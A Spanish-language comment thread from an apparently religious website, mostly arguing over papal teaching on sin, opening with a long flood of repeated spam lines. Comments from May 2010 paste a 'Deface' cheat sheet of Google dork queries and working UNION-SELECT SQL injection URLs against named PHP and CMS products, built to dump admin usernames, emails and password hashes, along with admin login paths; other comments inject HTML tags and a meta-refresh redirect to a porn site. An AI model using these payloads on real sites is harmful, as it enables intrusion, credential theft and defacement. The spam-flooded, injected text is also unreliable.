!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!!!!!arriva dios padre!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 



!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 



 



sdfsdf sdfsdf 09/05/2010 a las 02:24

<table border>"100000"

sss sss 09/05/2010 a las 02:35


allinurl: "fundlinkllc.com"
Inyeccions SQL: showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,passw ord)/**/from/**/users

Deface PHP-Newsletter(cat_id) SQL
Lo Que Buscaremos En Google: llinurl: "index.php?pgid"cat_id
Inyeccion SQL: index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7 c,username,0x7c,password),0x3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1

Deface Powered by Com Endeavors SQL
Buscar En Google: allinurl: "index.php?go=detail"
Inyeccion SQL: index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7 c,email,0x3a,concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2,2/**/from/* */admin/*where,limit,2--

Deface Powered by niccell SQL
Buscar En Google: "powered by niccell"
Inyeccions SQL: list.php?pagenum=S@BUN&categoryid=9999+union+select+111,222,concat(login,0x 3a,password),444+from+admin_login/*

Deface KwsPHP v1.3.456 SQL
Buscar En Google: "index.php?mod=galerie"action=gal
Inyeccion SQL: index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,co ncat(pseudo,0x3a,pass),concat(pseudo,0x3a,pass),4,5,6,7/**/from/**/users/*

Deface Powered by Esy SQL
Buscar En Google: "Powered by Esy"
Inyeccion SQL: sections.php?op=viewarticle&artid=-9999999/**/union/**/select/**/0,1,aid,pw d,4/**/from/**/nuke_authors/*
Inyeccions SQL 2: sections.php?op=printpage&artid=-9999999/**/union/**/select/**/aid,pwd/**/f rom/**/nuke_authors/*

Deface showresult
Buscar En Google: allinurl: "index.php?p=poll"showresult
Inyeccion SQL: index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pas s),1,2,3+from+kpro_user

Deface powered by koobi-cms 4.3.0
Buscar En Google: Koobi CMS 4.3.0: "powered by koobi-cms 4.3.0"
Inyeccion SQL: index.php?area=1&p=gallery&action=showimages&galid=[SQL]
ESTE PARA EL ADMIN: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*

Deface Powered by BosClassifieds Classified Ads System
Buscar En Google: "Powered by BosClassifieds Classified Ads System"
Inyeccion SQL: site.c0m/bosclassifieds/index.php?cat=[SQL]
Solo Para Vercion: BosClassifieds 3.0

Deface Powered by SmallBiz eShop
Buscar En Google: Powered by SmallBiz eShop
Inyeccion SQL: index.php?content_id=-20\'%20union%20select%20convert(concat(database(),cha r(5,8)user(),char(5,version()),char)/*

Deface pollBooth
Buscar En Google: allinurl: "pollBooth.php?op=results"pollID
Inyeccion SQL: pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users

Deface RS MAXSOFT
Buscar En Google: "RS MAXSOFT"
Inyeccion SQL: modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a, pass)+from+admin
ADMiN LOGiN=admin.php?page=logfrm

Deface gallerypic img
Buscar En Google: allinurl: "index.php?p=gallerypic img_id"
Inyeccion SQL: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass) ,4,5,6,7,8+from+koobi4_user
Inyeccion SQL 2: index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass) ,4,5,6,7,8+from+koobi_user
Admin Login: login=admin/login.php

Deface Powere By SSWD
Buscar En Google: allinurl: "index.php?go=subcat"
Inyeccion SQL: index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a, password),3,4,5,6/**/from/**/admin/*

Deface Powered by OpenLD
Buscar En Google: "Powered by OpenLD"
Inyeccion SQL: index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,valu e,null,null,null,null  ,null,null,null,null/**/FROM/**/settings--

Deface Index php P Shop
Buscar En Google: allinurl: "index php p shop"categ
Inyeccion SQL: index.php?p=shop&show=showdetail&fid=ulus&categ=-1+union+select+0,concat(em ail,0x3a,pass),2+from+kpro_user
Admin Login: login=admin/login.php

Deface Powered by Site Sift
Buscar En Google 1 : powered by Site Sift
Buscar En Google 2 : allinurl: "index php go addpage"
Buscar En Google 3 : allinurl: "index.php?go=detail id="
Inyecion SQL 1 : index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3 a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*
Inyecion SQL 2 : index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3 a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin /*
Admin Login: admin/login.php

Deface Showlink
Buscar En Google: allinurl: "index.php?showlink"links
Inyeccion SQL: index.php?showlink=ulus&fid=ulus8&p=links&area=1&categ=-1+union+select+0,co ncat(email,0x3a,pass),2+from+kpro_user
Admin Login: login=admin/login.php

Deface Powered by eSyndiCat
Buscar Google: © 2005-2006 Powered by eSyndiCat Directory Software
Inyeccion SQL: news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/*
Admin Login: from%20dir_admins/*

Deface CartWeaver
Buscar En Google: allinurl:Results.cfm?category=
Inyecion SQL Para Sacar El Nombre Del Admin: Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20admin_username%20from%20tbl_adminuser s))
Inyecion SQL Para Sacar La Password: Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20char(97)%2badmin_password%20from%20tb l_adminusers))
Admin Login: /cw2/admin/

Deface Bwired
Buscar En Google: "Powered by bwired" inurl:?newsID=
Inyeccion SQL: index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser

Deface Powered by Md-Pro
Buscar En Google: "Powered by Md-Pro"
Inyeccion SQL: index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*

DefaceBrowse Blogs by Category
Buscar En Google: allintext:"Browse Blogs by Category"
Inyeccion SQL: index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(use rname,0x3a,password),4,5,6/**/FROM/**/websiteadmin_admin_users/*

Deface eMeeting Online Dating Software 5.2
Buscar En Google: allintext:"Home Member Search Chat Room Forum Help/Support privacy policy"
Inyecion SQL 1 : b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,passwor d),5,6,7,8,9,10/**/from/**/members/*
Inyecion SQL 2 : b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,passwor d),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*

Deface FlashGameScript 1.7
Buscar En Google: "Powered by FlashGameScript"
Inyeccion SQL 1 : index.php?func=member&user=\'+union+select+0,0,0,0,0,0,0,0,0,0,username,pas sword,0,0,0,0,0,user_type+from+members+where+user_type=2/*
Inyeccion SQL 2 ::index.php?func=member&user=\'+union+select+0,0,0,0,0,0,0,0,0,0,username,p assword,0,0,0,0,user_type+from+members+where+user_type=2/*


dd dd 09/05/2010 a las 02:38

index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6/**/from/**/admin/*

rgwe rgwe 19/05/2010 a las 22:31

<h1>frrgtr

rgtrew rgtrew 19/05/2010 a las 22:34

<META HTTP-EQUIV="refresh" CONTENT="1; url=www.tupornotv.com

rgtrew rgtrew 19/05/2010 a las 22:35

<h1>rgr<h1>

rgtrew rgtrew 19/05/2010 a las 22:36

pero para que discuten cuan es la iglesia verdadera si la iglesia de Jesus es una sola todo ser humano que sige a Jesus de corazon es la iglesia


Dios le bendiga

toni toni 17/09/2010 a las 12:19

grasias jesus por estar con nosotros por crusificarte por nosotro pecadodos por estar siempre con nosotros por simplement amarnos y perdonarnos por todo lo mal q t emos echo por q tu nos amas sobre todas las cosas t amo jesus grasias mi selor jesus aleluya señor jesus vendito y alabado seas

alex alfaro laguna alex alfaro laguna 18/11/2010 a las 21:48

ARRIBA ES CON B!!!    DE BURROOOOOOO

Anto Llor Anto Llor 19/04/2011 a las 09:24

sobre lo del medio ambiente, no es la contaminaciòn como tal, sino el daño que le estamos causando a humanidad, Jesùs dijo un mandamiento nuevo os doy, que nos amemos los unos a los otros como yo heamado, y es lògico que si faltamos a ese mandamiento estamos pecando, y si contaminas, estamos contribuyendo a una larga lista de consecuencias fatales para todo ser vivo, por ejemplo, las deformidades en los niños, el càncer de piel, los problemas respiratorios, y asi muchas otras que no terminarìa de contar, es por esto que estamos faltando a este mandamiento, entonces no es añadir ni quitar, solo ayudar y tener conciencia.  ¿ o es que estàn de acuerdo con la contaminaciòn? no solo es hablar y decir que viva Dios y Jesùs es HACER y no solo criticar tambièn hay que pensar y deducir como seres inteligentes que somo

yami yami 12/06/2011 a las 15:33

Me parece muy bien que el Santo Padre Benedicto XVI haya añadido algunos mas que estan muy apegados a las cosas que estamos viviendo hoy en dia. 
Si mi iglesia que es guiada por el Espiritu Santo lo marca, pues entonces no entriscere al Espiritu Santo. 

Anónimo Anónimo 02/07/2011 a las 16:49

BLASDEMIA BLASFEMIA Y MAS BLASFEMIA


Cada vez que los católicos llaman al papa "Santo Padre", ¡lo están llamando Dios!



El nombre "Santo Padre" se encuentra UNA sola vez en toda la Biblia, ¡y se refiere a Dios Padre! ¡Están llamando a papa con el nombre de Dios! Es una blasfemia extrema llamar a un hombre así. El siguiente pasaje muestra a Jesús orando antes de que El y sus discípulos fueran al jardín de Gethsemaní:


"Y ya no estoy en el mundo; mas éstos están en el mundo, y yo á ti vengo. Padre santo, á los que me has dado, guárdalos por tu nombre, para que sean una cosa, como también nosotros" (Juan 17:11).


Dios mío, ¡permíteles ver la verdad!


Ademas los pecados los decide Dios a travez de el evangelio y no un simple hombre que puede ser hasta un PECADOR EMPEDERNIDO DE PECADOS OCULTOS DENTRO DE SU ENCIERRO MANASTERIAL


YA ES POR TODOS CONOCIDOS A LOS PAPAS HEREJES PAPAS HOMOSEXUALES PAPAS DELINCUENTES PAPAS ASESINOS PAPAS SODOMITAS COMO LOS BORGIA  QUE NOS RESEÑA LA HISTORIA A TRAVEZ DE LOS SIGLOS PASADOS


CALEB CALEB 02/07/2011 a las 21:06

Creo que un pecado invade al que escribió este articulo: LA SOBERBIA.     Te consideras con la autoridad de juzgar lo que esta bien y está mal en otra iglesia, preocúpate tú por hacer las cosas de manera correcta que tu DIOS que todo lo ve sabe lo que hay en tu corazón (por favor más humildad).    No veas la paja en el ojo ajeno porque tu tienes una viga que no te deja ver...     no se, ojalá todo en tu iglesia sea perfecto, ojalá no existiese el pecado, como dices, el pecado es pecado y no porque el papa  haya mencionado que hay que considerar estos pecados que se están cometiendo es que sean nuevos, nuestra sociedad esta volviéndose inconsciente de ello y hay que hacerlo notar y no porque algo no esté en la biblia no existe, los tractores no se mencionan y existen, y cosas nuevas que se ven ni idea tenían en su tiempo de que existirían y ya están, pero no por eso deja de alcanzarlas el poder de DIOS...   dejemos de critica solamente y empecemos a construir que es lo que nos hace falta, no hay peor asesino que el que mata la fe, que el que mata el alma, OJALA ENTIENDAS LO QUE DIGO, mi correo es mushni75@hotmail.com    o circe_dione@hotmail.com de preferencia, espero tu respuesta.

Jorge Rodriguez Jorge Rodriguez 06/08/2011 a las 07:51

Respecto a que la iglesia no considera pecado el alcoholismo por favor especifica en que catecismo o documento el que sea, la iglesia libera de pecado al que toma ESPECIFICALO no escribas solo porque tienes la posibilidad de hacerlo (sinonimo de ignorancia no fundamentar lo escrito).    ¿Quien dice que no es pecado la pedrastía?    Tambien cita la fuente por favor y que sea algo comprobable y de peso, no vayas a salir con que lo dijo Pancho López; y la mentablemente de eso no esta libre ninguna iglesia, escribe "PEDERASTIA PASTOR"  en  youtube y tendras infinidad de casos, no hablemos de otras cosas como homosexualidad, abuso sexual, acoso sexual...        NO VEAS LA PAJA....   ¿Es necesario repetirlo?

Jorge Rodriguez Jorge Rodriguez 06/08/2011 a las 07:57

¿Y con que autoridad tu decides si es pecado o no matar a un inocente por salvar a su madre? Si lamentablemente  ese es el destino, se debe dejar en manos de Yahve quien viva, que el decidirá lo que para la gloria de cada quien sea necesario, y fijate mano, a lo que puede llevar tu interpretación y la mia y la de cada quien, si es la voluntad de Dios que alguien le sea llegado su fin, ¿No será que al meter la mano nosotros e impedir que muera, con una operacion o lo que sea, estamos evitando que lo que Dios tenia decidido sucediera? Entonces eso sería un pecado pues estariamos en contra de sus designios...  aaaaah pero!!! y si veo que alguien esta moribundo y no le ayudo, tambien estoy en pecado por no hacer nada por él, que es Cristo mismo en persona...      ¿Cómo te cae el dilema?     Asi que maestro...     No digas tú qué es pecado y que no, porque así como tú dices que el papa no lo puede decicidir, me supongo que tú si eres alguien santo e iluminado para hacerlo, y con una mayor cercanía a Dios.  

Jorge Rodriguez Jorge Rodriguez 06/08/2011 a las 08:08

Respecto al perdón de los pecados mi ILUSTRADO amigo, me supongo que sabes que JESUS envió a los apóstoles y en su nombre les dió la autoridad para expulsar demonios y no se, a menos que yo tenga una biblia distinta a la tuya, también LES DIO AUTORIDAD PARA PERDONAR LOS PECADOS, a unos SIMPLES HOMBRES, como dicen ustedes, pero que hablas hermano si en cuanta religión no solo se ostentan con esos poderes, ademas de ello hay pastores y sacerdotes que "tienen el don" de sanar enfermos emulándose al mismo JESÚS, el hijo de DIOS, eso sería pecado si lo tomáramos desde tu perspectiva, eso no sería posible porque el único que tendría dominio sobre los demonios, sobre la enfermedad sobre los poderes celestiales sería DIOS, pero no, Dios en su gran misericordia concede este poder a sus apóstoles y con la imposición de las manos (que ustedes también practican)  se ha ido sucediendo de generación en generación hasta nuestros sacerdotes de hoy, ¿Dónde? En la Iglesia fundada por Cristo, y por cierto, recuerda: "Una sola fe, una sola iglesia, un solo bautismo, un solo señor".           

Jorge Rodriguez Jorge Rodriguez 06/08/2011 a las 08:17

